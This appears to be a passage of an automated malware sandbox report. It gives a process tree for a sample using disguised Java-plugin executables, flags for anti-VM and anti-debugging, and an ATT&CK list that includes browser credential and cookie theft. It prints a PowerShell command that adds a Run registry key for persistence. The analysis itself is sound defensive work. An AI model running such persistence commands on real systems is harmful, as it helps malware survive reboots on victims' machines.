        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe\"'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        
        PID:10120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe"
1⤵
PID:10264
- C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
  2⤵
  PID:10324
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
    3⤵
    PID:10372
  - - C:\Windows\system32\reg.exe
      reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatformw.exe"
      4⤵
      Modifies registry key
      PID:10416

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:10476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{10a91c6c-893d-4b92-8721-7595eee6e93f}\c5bf7783-86ce-4113-89e9-ac37bfec346c.cmd"9
1⤵
PID:7812

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3972

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Safe Mode Boot

T1562.009

Modify Authentication Process

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion